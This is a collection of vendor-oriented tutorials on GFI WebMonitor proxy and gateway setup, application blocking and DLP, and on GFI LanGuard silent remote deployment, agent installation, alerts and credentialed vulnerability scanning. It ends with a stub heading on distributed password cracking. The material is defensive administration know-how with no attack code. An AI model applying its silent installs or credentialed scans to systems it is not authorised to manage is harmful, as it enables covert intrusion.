WebMonitor is an award-winning gateway monitoring and internet access control solution designed to help organizations deal with user internet traffic, monitor and control bandwidth consumption, protect computers from internet malware/viruses and other internet-based threats, plus much more. GFI WebMonitor supports two different installation modes: Gateway mode and Simple Proxy mode. We’ll be looking into each mode and helping administrators and engineers understand which is best, along with the prerequisites and caveats of each mode.

Proxy vs Gateway Mode

Proxy mode, also named Simple Proxy mode, is the simplest way to install GFI WebMonitor. You can deploy this on any computer that has access to the internet. In Simple Proxy mode, all client web-browser traffic (HTTP/HTTPS) is directed through GFI WebMonitor. To enable this type of setup, you will need an internet-facing router that can forward traffic and block ports.

With GFI WebMonitor functioning in Simple Proxy mode, each client machine must also be configured to use the server as a web proxy for the HTTP and HTTPS protocols. GFI WebMonitor comes with built-in Web Proxy Auto-Discovery (WPAD) server functionality that makes the process easy – simply enable automatic discovery of the proxy server on each of your client machines and they should automatically find and use WebMonitor as a proxy. In a domain environment, it is best to regulate this setting using a Group Policy Object (GPO).
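
For anything that does not honour WPAD – a script, a scheduled job, a thick client you control – pointing it at the proxy explicitly is straightforward. A small Python sketch, assuming WebMonitor is listening as a proxy on 192.168.1.10 port 8080 (an address and port chosen purely for illustration) and using the third-party ‘requests’ package:

import requests  # third-party package, assumed installed

# Hypothetical address of the GFI WebMonitor server acting as a simple proxy.
PROXIES = {
    "http": "http://192.168.1.10:8080",
    "https": "http://192.168.1.10:8080",
}

# HTTP and HTTPS requests made this way are forced through the proxy, so
# WebMonitor can log, filter or block them just like browser traffic.
response = requests.get("https://www.firewall.cx/", proxies=PROXIES, timeout=15)
print(response.status_code, len(response.content), "bytes received via proxy")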

When WebMonitor is configured to function in Internet Gateway mode, all inbound and outbound client traffic will pass through GFI WebMonitor, irrespective of whether the traffic is HTTP or non-HTTP. With Internet Gateway mode, the client browser does not need to point to any specific proxy – all that’s required is to enable the Transparent Proxy function in GFI WebMonitor.

Supported OS & Architectures

Whether functioning as a gateway or a web proxy, GFI WebMonitor processes all web traffic. For smooth operation, that means using server hardware capable of handling all those requests every day. When the environment is small (10-20 nodes), for instance, a 2 GHz processor and 4 GB RAM minimum with a 32-bit Windows operating system will suffice.

Larger environments, such as those running the Windows Server operating system with a minimum of 8 GB RAM and a multi-core CPU, will require the 64-bit architecture. GFI WebMonitor works with both 32-bit and 64-bit Windows operating system architectures, starting from Windows 2003 and Windows Vista.

Installation & Upgrading

When installing for the first time, GFI WebMonitor starts by detecting its prerequisites. If the business is already using GFI WebMonitor, the process determines the prerequisites according to the older product instance. If the installation kit encounters an older instance, it imports the previous settings and redeploys them after completing the installation.

Whether installing for the first time or upgrading an older installation, the installation kit looks for any setup prerequisites necessary and installs them automatically. However, some prerequisites may require user interaction and these will come up as separate installation processes with their own user interfaces.

Installing GFI WebMonitor

As with all GFI products, installation is a very easy follow-the-bouncing-ball process. Once the download of GFI WebMonitor is complete, execute the installer using an account with administrative privileges.

If WebMonitor has been recently downloaded, you can safely skip the newer build check. When ready, click Next to proceed:

gfi-webmonitor-installation-setup-gateway-proxy-mode-1

Figure 1. Optional check for a new WebMonitor edition during installation

You will need to fill in the username and/or the IP address that will have administrative access to the web-interface of GFI WebMonitor, then click Next to select the folder to install GFI WebMonitor and finally start the installation process:

gfi-webmonitor-installation-setup-gateway-proxy-mode-2

Figure 2. Selecting Host and Username that are allowed to access the WebMonitor Administration interface.

Once the installation process is complete, click Finish to finalize the setup and leave the Open Management Console checked:

gfi-webmonitor-installation-setup-gateway-proxy-mode-3

Figure 3. Installation complete – Open Management Console

After this, the welcome screen of the GFI WebMonitor Configuration Wizard appears. This will allow you to configure the server to operate in Simple Proxy Mode or Gateway Mode. At this point, it is recommended you enable JavaScript in Internet Explorer or the web browser of your choice before proceeding further:

Figure 4. The welcome screen once WebMonitor installation has completed

After clicking on Get Started to proceed, we need to select which of the two modes GFI WebMonitor will be using. We selected Gateway mode to ensure we get the most out of the product as all internet traffic will flow through our server and provide us with greater granularity & control:

Figure 5. Selecting between Simple Proxy and Gateway mode

The Transparent Proxy can be enabled at this stage, allowing web browser clients to automatically configure themselves using the WPAD protocol. WebMonitor shows a simple network diagram to help understand how network traffic will flow to and from the internet:

Figure 6. Internet traffic flow in WebMonitor’s Gateway Mode

Administrators can select the port at which the Transparent Proxy will function and then click Save and Test Transparent Proxy. GFI WebMonitor will confirm Transparent Proxy is working properly.

Now, click Next to see your trial license key or enter a new license key. Click on Next to enable HTTPS scanning.

HTTPS Scanning gives you visibility into secure surfing sessions that can threaten the network's security. Malicious content may be included in sites visited or files downloaded over HTTPS. The HTTPS filtering mechanism within GFI WebMonitor enables you to scan this traffic. There are two ways to configure HTTPS Proxy Scanning Settings, via the integrated HTTPS Scanning Wizard or manually.

Thanks to GFI WebMonitor’s flexibility, administrators can add any HTTPS site to the HTTPS scanning exclusion list so that it bypasses inspection.

If HTTPS Scanning is disabled, GFI WebMonitor enables users to browse HTTPS websites without decrypting and inspecting their contents.

When ready, click Next again and provide the full path of the database. Click Next again to enter and validate the Admin username and password. Then, click Next to restart the services. You can now enter your email details and click Finish to end the installation.

Figure 7. GFI WebMonitor’s main control panel

Once the installation and initial configuration of GFI WebMonitor is complete, the system will begin gathering useful information on our users’ internet usage.

In this article we examined WebMonitor Simple Proxy and Gateway installation mode and saw the benefits of each method. We proceeded with the Gateway mode to provide us with greater flexibility, granularity and reporting of our users’ internet usage. The next articles will continue covering in-depth functionality and reporting of GFI’s WebMonitor.


GFI WebMonitor: Monitor & Secure User Internet Activity, Stop Illegal File Sharing - Downloads (Torrents), Web Content Filtering For Organizations

In our previous article we analysed the risks and implications involved for businesses when there are no security or restriction policies and systems in place to stop users distributing illegal content (torrents). We also spoke about unauthorized access to company systems, sharing sensitive company information and more. This article talks about how specialized systems such as WebMonitor are capable of helping businesses stop torrent applications accessing the internet, control the websites users access, block remote control software (Teamviewer, Remote Desktop, Ammy Admin etc) and put a stop to users wasting bandwidth, time and company money while at work.

WebMonitor is more than just an application. It can help IT departments design and enforce internet security policies by blocking or allowing specific applications and services accessing the internet.

WebMonitor is also capable of providing detailed reports of users’ web activity – a useful feature that ensures users are not accessing online resources they shouldn’t, and provides the business with the ability to check users’ activities in case of an attack, malware or security incident.

WebMonitor is not a new product - it carries over a decade of development and has served millions of users since its introduction into the IT market. With awards from popular IT security magazines, Security Experts, IT websites and more, it’s the preferred solution when it comes to a complete web filtering and security monitoring solution.

Blocking Unwanted Applications: Application Control – Not Port Control

Senior IT managers, engineers and administrators surely remember the days when controlling TCP/UDP ports at the firewall level was enough to block applications or allow them access to the internet. For some years now, this has no longer been a valid way of controlling applications, as most ‘unwanted’ applications can smartly use common ports such as HTTP (80) or HTTPS (443) to circumvent security policies, passing inspection and freely accessing the internet.

In order to effectively block unwanted applications, businesses must realize that it is necessary to have a security gateway device that can correctly identify the applications requesting access to the internet, regardless of the port they are trying to use – aka Application Control.

Application Control is a sophisticated technique that requires upper layer (OSI Model) inspection of data packets as they flow through the gateway or proxy, e.g. GFI WebMonitor. The gateway/proxy executes deep packet level inspection to identify the application requesting access to the internet.

In order to correctly identify the application the gateway must be aware of it, which means it has to be listed in its local database.
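
A heavily simplified way to picture that lookup is the toy Python sketch below. It only illustrates the general idea of matching traffic against a local signature database regardless of the port in use; it is not GFI’s engine, and real implementations inspect far more than the first few bytes:

# Toy signature database: byte patterns that identify an application,
# no matter which TCP port the flow happens to use.
APP_SIGNATURES = {
    b"\x13BitTorrent protocol": "BitTorrent",   # BitTorrent handshake prefix
    b"SSH-2.0-": "SSH",                         # SSH version banner
    b"GET ": "HTTP",                            # plain HTTP request
    b"\x16\x03": "TLS/HTTPS",                   # TLS handshake record header
}

def identify_application(payload: bytes) -> str:
    """Return the application whose signature matches the start of the
    payload, or 'unknown' if it is not in the local database."""
    for signature, app_name in APP_SIGNATURES.items():
        if payload.startswith(signature):
            return app_name
    return "unknown"

# Example: a BitTorrent handshake sent over port 443 is still identified.
sample = b"\x13BitTorrent protocol" + b"\x00" * 8
print(identify_application(sample))   # -> BitTorrent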

The Practical Benefits Of Internet Application Control & Web Monitoring Solution

Let’s take a more practical look at the benefits an organization has when implementing an Application Control & Web Monitoring solution:

  • Block file sharing applications such as Torrents
  • Stop users distributing illegal content (games, applications, movies, music, etc)
  • Block remote access applications such as TeamViewer, Remote Desktop, VNC, Ammy Admin and more.
  • Stop unauthorized access to the organization’s systems via remote access applications
  • Block access to online storage services such as DropBox, Google Drive, Hubic and others
  • Avoid users sharing sensitive information such as company documents via online storage services
  • Save valuable bandwidth for the organization, its users, remote branches and VPN users
  • Protect the network from malware, viruses and other harmful software downloadable via the internet
  • Properly enforce different security policies to different users and groups
  • Protect against possible security breaches and minimize responsibility in case of an infringement incident
  • And much more

The above list contains a few of the major benefits that solutions such as WebMonitor can offer to organizations.

Why Web Monitoring & Content Filtering is Considered Mandatory

Web monitoring is a very sensitive topic for many organizations and their users, mainly because users do not want others to know what they are doing on their computers. The majority of users perceive web monitoring as spying on them to see what sites they are accessing and whether they are wasting time on websites and internet resources unrelated to work; however, users do not understand the problems and security risks that are most likely to arise if no monitoring or content filtering mechanism is in place.

In fact, the damage caused by users irresponsibly visiting high-risk sites and surfing the internet without any limits is far bigger than most companies might think, and there are some really great examples that help prove this point. The US FBI website has a page with examples of internet scams and risks from social media networking sites.

If your organization is one of the lucky ones that hasn’t been hit (yet) by irresponsible user internet activity, then we are here to assure you that it’s simply a matter of time.

Apart from the imminent security risk, users who have uncontrolled access are also wasting bandwidth – bandwidth the organization is paying for – and are likely to slow down the internet for the rest who are legitimately trying to get work done. In cases where VPNs are running over the same lines, VPN users, remote branches and mobile users are most likely to experience slow connection speeds when accessing the organization’s resources over the internet.

This problem becomes even more evident when asymmetrical WAN lines, such as ADSL lines, are in use. On an asymmetrical line, a single user who is uncontrollably uploading photos, movies (via torrent) or other content can affect all other users downloading, since bottlenecks can easily occur when one of the two streams (downstream or upstream) is under heavy usage.

Finally, if there is an organizational security policy in place, it is most likely to contain fair internet usage guidelines for users and specify what they can and cannot do using the organization’s internet resources. The only way to enforce such a policy is through a sophisticated web monitoring and policy enforcement mechanism such as GFI WebMonitor.

Summary

In this article we analysed how specialized web monitoring and control software, such as WebMonitor, is able to control which user applications can access the internet, control which websites users within an organization can access, and block unwanted internet content while saving valuable bandwidth. With such solutions, organizations are able to enforce their internet security policies while at the same time protecting themselves from unauthorized access to their systems (remote desktop software), stopping illegal activities such as torrent file sharing and more.


Dealing with User Copyright Infringement (Torrents), Data Loss Prevention (DLP), Unauthorized Remote Control Applications (Teamviewer, RDP) & Ransomware in the Business Environment

One of the largest problems faced by organizations of any size is effectively controlling user internet access (from laptops, mobile devices, workstations etc), minimizing the security threats for the organization (ransomware – data loss prevention), preventing user copyright infringement (torrent downloading/sharing of movies, games, music etc) and discovering where valuable WAN/Internet bandwidth is being wasted.

Organizations clearly understand that using a firewall is no longer adequate to control the websites their users are able to access, remote control applications (Teamviewer, Radmin, Ammyy Admin, Remote Desktop etc), file sharing applications such as BitTorrent clients (uTorrent, BitComet, Deluge, qBittorrent etc), online cloud storage services (Dropbox, OneDrive, Google Drive, Box, Amazon Cloud Drive, Hubic etc) and other services and applications.

The truth is that web monitoring applications such as GFI’s WebMonitor are a lot more than just a web proxy or internet monitoring solution.

Web monitoring applications are essential for any type or size of network as they offer many advantages:

  • They stop users from abusing internet resources
  • They block file-sharing applications and illegal content sharing
  • They stop users using cloud-based file services to upload sensitive documents, for example saving company files to their personal DropBox, Google Drive etc.
  • They stop remote control applications connecting to the internet (e.g. Teamviewer, Remote Desktop, Ammyy Admin etc)
  • They ensure user productivity is kept high by allowing access to approved internet resources and sites
  • They eliminate referral ad sites and block abusive content
  • They support reputation blocking to automatically filter websites based on their reputation
  • They help IT departments enforce security policies to users and groups
  • They provide unbelievable flexibility allowing any type or size of organization to customise its internet usage policy to its requirements

The Risk In The Business Environment – Illegal Downloading

Most businesses are completely unaware of how serious these matters are and of the risks they are taking while dealing with other ‘more important’ matters.

Companies such as the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA) are in a continuous battle suing and fighting with companies, ISPs and even home users for illegally distributing movies and music.

Many users are aware of this and are now turning to their company’s internet resources, which in many cases offer faster and unlimited data transfer, to download their illegal content such as movies, games, music and other material.

An employer or business can be easily held responsible for the actions of its employees when it comes to illegal download activities, especially if no policies or systems are in place.

In the case of an investigation, if the necessary security policies and web monitoring systems are in place to prevent copyright infringement and illegal downloading, the business is far less exposed to the legal implications of its users' actions and is also able to track down the person responsible.

Data Loss Prevention (DLP) – Stop Users From Uploading Sensitive/Critical Documents

While illegal downloading is one major threat for businesses, stopping users from sharing company data and sensitive information (Data Loss Prevention, or DLP) is another big problem.

With the explosion of (free) cloud-based storage services such as DropBox, OneDrive, Google Drive and others, users can quickly and easily upload any type of document directly from their workplace to their personal cloud storage and instantaneously share it with anyone in the world, without the company’s consent or knowledge.

These smartly designed cloud-storage applications use HTTP and HTTPS to transfer files, circumventing firewall security policies and other types of protection.

More specialised application proxies such as GFI’s WebMonitor can effectively detect and block these applications, saving businesses from major security breaches and damages.

Block Unauthorized Remote Control Applications (TeamViewer, Ammyy Admin, Remote Desktop, VNC etc) & Ransomware

Remote control applications such as Teamviewer, Ammyy Admin, Remote Desktop and others have been causing major security issues in organizations around the world. In most cases, users run these clients so they can remotely access and control their workstation from home, continuing their “downloads”, transferring files to their home PC and carrying out other unauthorized activities.

In other cases, these remote applications become targets for pirates and hackers, who try to hijack sessions that have been left running by users.

Ransomware is a newer type of threat in which, through an application running on the user’s workstation, attackers gain access and encrypt the files found on the computer, and often on network drives and shares across the company.

In late 2015, the popular remote control software Ammyy Admin was injected with malicious code, and unaware home and corporate users downloaded and used the free software. Infected with at least five different malware variants, they gave attackers full access to and control over their PCs. Some of the malware facilitated the theft of banking details, while other variants encrypted user files and demanded money to decrypt them.

In another case during 2015, attackers began installing ransomware on computers running Remote Desktop Services. The attackers obtained access via brute-force attacks and then installed their malware, which started scanning for specific file extensions. A ransom of $1,000 USD was demanded in order to have the files decrypted.

Blocking these types of applications is a major issue for companies, as users make uncontrolled use of them without realizing they are putting their company at serious risk.

Use of such applications should be heavily monitored and restricted because they pose a significant threat to businesses.

GFI WebMonitor’s extensive application list has the ability to detect and effectively block these and many other similar applications, putting an end to this major security threat.

Summary

The internet today is certainly not a safe place for users or organizations. The security threats are real: users downloading and distributing illegal content, sharing sensitive company information, accessing their systems from home or other locations without any control, and attackers gaining access to internal systems via remote desktop programs. Avoid getting your company caught with its pants down and seek ways to tighten and enforce security policies that will help protect it from these ever-present threats.


Automate Software Deployment with the Help of GFI LanGuard. Quick & Easy Software Installation on all PCs – Workstations & Servers

Deploying a single application to hundreds of workstations or servers can become a very difficult and time-consuming task. Thankfully, remote deployment of software and applications is a feature offered by GFI LanGuard. With Remote Software Deployment, we can automate the installation of pretty much any software to any number of computers on the network, including Windows servers (2003, 2008, 2012), Domain Controllers, Windows workstations and more.

In this article we’ll show how easy it is to deploy any custom software using GFI LanGuard. For our demonstration purposes, we’ll deploy Mozilla Firefox to a Windows server.

To begin configuring the deployment, select the Remediate tab from GFI LanGuard, then select the Deploy Custom Software option as shown below:

Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Figure 1. Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Next, select the target machine from the left panel. We can select one or multiple targets using the CTRL key. For our demonstration, we selected DCSERVER, which is a Windows 2003 server.

Now, from the Deploy Custom Software section, click on Add to select the software to be deployed. This will present the Add Custom Software window where we can select the path to the installation file. GFI LanGuard also provides the ability to run the setup file using custom parameters. This handy feature allows the execution of silent installations (no window/prompt shown on the target machine's desktop), if supported by the application to be installed. Mozilla Firefox supports silent installation using the '-ms' parameter:
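For reference, the same silent installation can be tested locally from a command prompt before deploying it network-wide. A minimal sketch (the installer file name is only an example and will vary with the Firefox version you downloaded):

"Firefox Setup.exe" -ms

If the installer completes without displaying any windows, the same parameter will behave identically when pushed out by GFI LanGuard.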

GFI LanGuard custom software deployment using a parameter for silent installation Figure 2. GFI LanGuard custom software deployment using a parameter for silent installation

When done, click on the Add button to return back to the main screen where GFI LanGuard will display the target computer(s) & software selected, plus installation parameters:

GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Figure 3. GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Clicking on the Deploy button brings up the final window where we can either initiate the deployment immediately or schedule it for a later time. From here, we can also insert any necessary credentials but also select to notify the remote user, force a reboot after the installation and many other useful options:

Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

Figure 4. Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

GFI LanGuard’s remote software deployment is so sophisticated that it even allows the configuration of the number of threads that will be executed on the remote computer (under the Advanced options link), helping ensure minimum impact for the user working on the remote system.

Once complete, click on OK to proceed with the remote deployment. LanGuard will then return back to the Remediation window and provide real-time update of the installation process, along with a detailed log below:

GFI LanGuard Remote software deployment of Mozilla Firefox complete

Figure 5. GFI LanGuard Remote software deployment of Mozilla Firefox complete

Installation of Mozilla Firefox was incredibly fast and, to our surprise, the impact on the remote host was undetectable. We actually didn’t realise the installation was taking place until the Firefox icon appeared on the desktop. The CPU history also confirms there was no additional load on the server:

Successful installation of Mozilla Firefox, without any system performance impact!

Figure 6. Successful installation of Mozilla Firefox, without any system performance impact!

GFI LanGuard’s software deployment feature is truly impressive. It not only provides network administrators with the ability to deploy software on any machine on their network, but also gives complete control over the way the software will be deployed and the resources that will be used on the remote computer during the installation. Additional options such as scheduling the deployment, custom user messages before or after the installation, remote reboot and many more make GFI LanGuard a necessary tool for any organization.


How to Manually Deploy – Install GFI LanGuard Agent When Access is Denied By Remote Host (Server – Workstation)

When IT Administrators and Managers are faced with the continuous failure of GFI LanGuard Agent deployment (e.g. Access is denied), it is best to switch to manual installation in order to save valuable time and resources. The failure can be due to incorrect credentials, a disabled account, firewall settings, disabled remote access on the target computer and more. Deploying GFI LanGuard Agents is the best way to scan your network for unpatched machines or machines with critical vulnerabilities.

GFI LanGuard Agent deployment failing with Access is denied

Figure 1. GFI LanGuard Agent deployment failing with Access is denied

Users interested can also check our article Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning and Deployment.

Step 1 – Locate Agent Package On GFI LanGuard Server

The GFI LanGuard Agent installation file is located in one of the following directories, depending on your operating system:

  • For 32bit operating systems: c:\Program Files\GFI\LanGuard 11\Agent\
  • For 64bit operating systems: c:\Program Files (x86)\GFI\LanGuard 11\Agent\

The location of GFI LanGuard Agent on our 64bit O/S.

Figure 2. The location of GFI LanGuard Agent on our 64bit O/S.

Step 2 – Copy The File To The Target Machine & Install

Once the file is copied to the target machine, execute it from a command prompt using the following single-line command:

c:\LanGuard11agent.msi /qn GFIINSTALLID="InstallationID" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv"

Note: InstallationID is an ID that can be found in the crmiini.xml file located in the GFI LanGuard directory on the server: c:\Program Files\GFI\LanGuard 11 Agent for 32bit O/S or c:\Program Files (x86)\GFI\LanGuard 11 Agent for 64bit O/S.
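A quick way to view the file and locate the ID without opening an editor is from a command prompt on the GFI LanGuard server. A minimal sketch, assuming the 64-bit path mentioned in the note above:

type "c:\Program Files (x86)\GFI\LanGuard 11 Agent\crmiini.xml"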

Following is a screenshot of the contents of our crmiini.xml file where the installation ID is clearly shown:

Installation ID in crmiini.xml file on our GFI LanGuard Server

Figure 3. Installation ID in crmiini.xml file on our GFI LanGuard Server

With this information, the final command line (DOS) for the installation of the Agent will be as follows:

LanGuard11agent.msi /qn GFIINSTALLID="e86cb1c1-e555-40ed-a6d8-01564bdb969e" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv"

Note: Make sure the command prompt is run with Administrator Privileges (Run as Administrator), to ensure you do not have any problems with the installation.

Here is a screenshot of the whole command executed:

Successfully Installing GFI LanGuard Agent On Workstations & Servers

Figure 4. Successfully Installing GFI LanGuard Agent On Workstations & Servers

Notice that the installation is a ‘silent install’ and will not present any message or prompt the user for a reboot. This makes it ideal for quick deployments where no reboot and minimal user interruption are required.

A restart will be necessary to complete the Agent initialization.

Important Notes

After completing the manual installation of the GFI LanGuard Agent, it is necessary to remotely deploy the Agent from the GFI LanGuard console as well, otherwise the GFI LanGuard server will not be aware of the Agent manually installed on the remote host.

Also, it is necessary to deploy at least one Agent remotely via the GFI LanGuard server console before attempting the manual deployment, in order to initially populate the crmiini.xml file with the installation ID parameters.

This article covered the manual deployment of GFI’s LanGuard Agent on Windows-based machines. We took a look at common reasons why remote deployment of the Agent might fail, and covered step-by-step the manual installation process and prerequisites to ensure the Agent is able to connect to the GFI LanGuard server.


Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning & Deployment

GFI LanGuard Agents are designed to be deployed on local (network) or remote servers and workstations. Once installed, the GFI LanGuard Agents can then be configured via LanGuard’s main server console, giving the administrator full control over when the Agents will scan the host they are installed on and communicate their status to the GFI LanGuard server.

Those concerned about system resources will be pleased to know that the GFI LanGuard Agent does not consume any CPU cycles or resources while idle. During scanning, which takes place once a day for a few minutes, the scan process is kept at a low priority to ensure that it does not interfere with or impact the host’s performance.

GFI LanGuard Agents communicate with the GFI LanGuard server using TCP port 1070 by default, although this can be configured.
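If Agent communication is being blocked by the Windows firewall on a managed host, a rule permitting this port may help. The following is only a sketch using the default TCP port 1070 and an arbitrary rule name; adjust it if you have changed the port:

netsh advfirewall firewall add rule name="GFI LanGuard Agent" dir=in action=allow protocol=TCP localport=1070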

Let’s see how we can install the GFI LanGuard Agent from the server’s console.

First open GFI LanGuard and select Agents Management from the Configuration tab:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-1

Figure 1. Select Agents Management and then Deploy Agents

Next, you can choose between Local domain or Custom to define your target(s):

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-2

Figure 2. Defining Target rules for GFI LanGuard Agent deployment

Since we’ve selected Custom, we need to click on Add new rule to add our targets.

The targets can be defined via their Computer name (shown below), Domain name or Organization Unit:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-3

Figure 3. Defining our target hosts using their Computer name

When complete, click on OK to return to the previous window.

We now see all computer hosts selected:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-4

Figure 4. Viewing selected hosts for Agent deployment

The Advanced Settings option in the lower left area of the window allows us to configure the automatic discovery of machines with Agents installed, set up the Audit schedule of the Agent (when it will scan its host and update the LanGuard server) and the Scan profile used by the Agent, plus an extremely handy feature called Auto Remediation, which enables GFI LanGuard to automatically download and install missing updates and service packs, uninstall unauthorized applications and more on the remote computers.

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-5

Figure 5. GFI LanGuard - Agent Advanced Settings – Audit Schedule tab

The screenshot below shows us the Auto Remediation tab settings:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-6

Figure 6. Agent Advanced Settings – Auto Remediation tab

When done, click on OK to save the selected settings and return back to the previous window.

Now click on Next to move to the next step. At this point, we need to enter the administrator credentials of the remote machine(s) so that GFI LanGuard can log into the remote machines and deploy the agent. Enter the username and password and hit Next and then Finish at the last window:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-7

Figure 7. Entering the necessary credentials for the Agent deployment

GFI LanGuard will now begin the deployment of its Agent to the selected remote hosts:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-8

Figure 8. GFI LanGuard preparing for the Agent deployment

After a while, the LanGuard Agent will report its installation status. Where successful, we will see the Installed message; otherwise a Pending install message will continue to be displayed, along with an error if the deployment was unsuccessful:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-9

Figure 9. LanGuard Agent installation status

Common problems preventing successful Agent deployment are incorrect credentials, firewall settings or insufficient user rights.

To check the status of the installed Agent, we can simply select the desired host, right-click and select Agent Diagnostic as shown below:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-10

Figure 10. Accessing GFI LanGuard Agent Diagnostics

The Agent Diagnostic window is an extremely helpful feature as it provides a great amount of information on the Agent and the remote host. In addition, at the end of the Diagnosis Activity window, we’ll find a zip file that contains all the presented information. This file can be emailed to GFI support in case of Agent problems:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-11

Figure 11. Running the Agent Diagnostics report

The GFI LanGuard Agent is an extremely useful feature that allows the automatic monitoring, patching and updating of the host machine, leaving IT Administrators and Managers free to deal with other important tasks. Thanks to its Domain & Workgroup support, GFI LanGuard can handle any type and size of environment. If you haven’t used it yet, download your copy of GFI LanGuard and give it a try – you’ll be surprised how much valuable information you’ll get on your systems’ security & patching status and the time you’ll save!


How to Configure Email Alerts in GFI LanGuard 2015 – Automating Alerts in GFI LanGuard

One of the most important features in any network security monitoring and patch management application such as GFI’s LanGuard is the ability to automate tasks, e.g. automatic network scanning, email alerts etc. This allows IT Administrators, Network Engineers, IT Managers and other IT department members to continue working on other important matters with the peace of mind that the security application is keeping things under control and will alert them instantly to any changes detected within the network or in the vulnerability status of the monitored hosts.

GFI LanGuard’s email alerting feature can be easily accessed either from the main Dashboard, where the Alerting Options notification warning usually appears at the bottom of the screen:

gfi-languard-configure-automated-email-alert-option-1

Figure 1. GFI LanGuard email alerting Option Notification

Or alternatively, by selecting Configuration from the main menu and then Alerting Options from the left side area below:

gfi-languard-configure-automated-email-alert-option-2

Figure 2. Accessing Alerting Options via the menu

Once in the Alerting Options section, simply click on the click here link to open the Alerting Options Properties window. Here, we enter the details of the email account that will be used, recipients and smtp server details:

gfi-languard-configure-automated-email-alert-option-3

Figure 3. Entering email, recipient & smtp account details

Once the information has been correctly provided, we can click on the Verify Settings button and the system will send the recipients a test notification email. In case of an IT department, a group email address can be configured to ensure all members of the department receive alerts and notifications.

Finally, at the Notification tab we can enable and configure a daily report that will be sent at a specific time of the day and also select the report format. GFI LanGuard supports multiple formats such as PDF, HTML, MHT, RTF, XLS, XLSX & PNG.

gfi-languard-configure-automated-email-alert-option-4

Figure 4. GFI LanGuard Notification Window settings

When done, simply click on the OK button to return back to the Alerting Options window.

GFI LanGuard will now send an automated email alert on a daily basis whenever there are changes identified after a scan.

This article showed how GFI LanGuard, a network security scanner, vulnerability scanner and patch management application, can be configured to automatically send email alerts and reports on network changes after every scan.


How to Scan Your Network and Discover Unpatched, Vulnerable, High-Risk Servers or Workstations using GFI LanGuard 2015

This article shows how any IT Administrator, network engineer or security auditor can quickly scan a network using GFI’s LanGuard and identify the different systems on it, such as Windows, Linux and Android. More importantly, we’ll show how to uncover vulnerable, unpatched or high-risk systems, including Windows Server 2003, Windows Server 2008, Windows Server 2012 R2, Domain Controllers, Linux servers such as Red Hat Enterprise, CentOS, Ubuntu, Debian, openSUSE and Fedora, any type of Windows workstation (XP, Vista, 7, 8, 8.1, 10) and Apple OS X.

GFI’s LanGuard is a Swiss-army knife that combines a network security tool, vulnerability scanner and patch management system all in one package. Using the network scanning functionality, LanGuard will automatically scan the whole network and use the provided credentials to log into every located host and discover additional vulnerabilities.

To begin, we launch GFI LanGuard and at the startup screen, select the Scan Tab as shown below:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-1

Figure 1. Launching GFI LanGuard 2015

Next, in the Scan Target section, select Custom target properties (box with dots) and click on Add new rule. This will bring us to the final window where we can add any IP address range or CIDR subnet:

 

Figure 2. Adding your IP Network – Subnet to LanGuard for scanning

Now enter the IP address range you would like LanGuard to scan, e.g 192.168.5.1 to 192.168.5.254 and click OK.

The new IP address range should now appear in the Custom target properties window:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-3

Figure 3. Custom target properties displays selected IP address range

Now click on OK to close the Custom target properties window and return back to the Scan area:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-4

Figure 4. Returning back to LanGuard’s Scan area

At this point, we can enter the credentials (username/password) to be used for remotely accessing the discovered hosts (domain administrator credentials are a good idea) and optionally click on Scan Options to reveal additional useful options to be used during our scan, such as Credential Settings and Power saving options. Click on OK when done:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-5

Figure 5. Additional Scan Options in GFI’s LanGuard 2015

We can now hit Scan to begin the host discovery and scan process:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-6

Figure 6. Initiating the discovery process in GFI LanGuard 2015

GFI LanGuard will begin scanning the selected IP subnet and list all hosts found in the Scan Results Overview window area. As shown in the above screenshot, each host will be identified according to its operating system and will be assessed for open ports, vulnerabilities and missing operating system & application patches.

The full scan profile selected will force GFI LanGuard to run a complete detailed scan of every host.

Once complete, GFI LanGuard 2015 displays a full report summary for every host and an overall summary for the network:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-7

Figure 7. GFI LanGuard 2015 overall scan summary and results

Users can select each host individually from the left window and its Scan Results will be displayed in the right window area (Scan Results Details). This method allows quick navigation through each host, but also allows the administrator or network security auditor to quickly locate the specific scan results they are after.

This article explained how to configure GFI LanGuard 2015 to scan an IP subnet, identify host operating systems, log into remote systems, and scan for vulnerabilities, missing operating system and application patches, open ports and other critical security issues. IT Managers, network engineers and security auditors should definitely try GFI LanGuard and see how easy and automated their job can become with such a powerful network security tool in their hands.


OpenMosix - Part 9: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

Now that you hopefully have a nice powerful cluster running, there are hundreds of different ways you can use it. The most obvious use is any activity that takes a long time and uses a large amount of CPU processing power and/or RAM. We're going to show you a couple of projects that have benefited us in the real world.

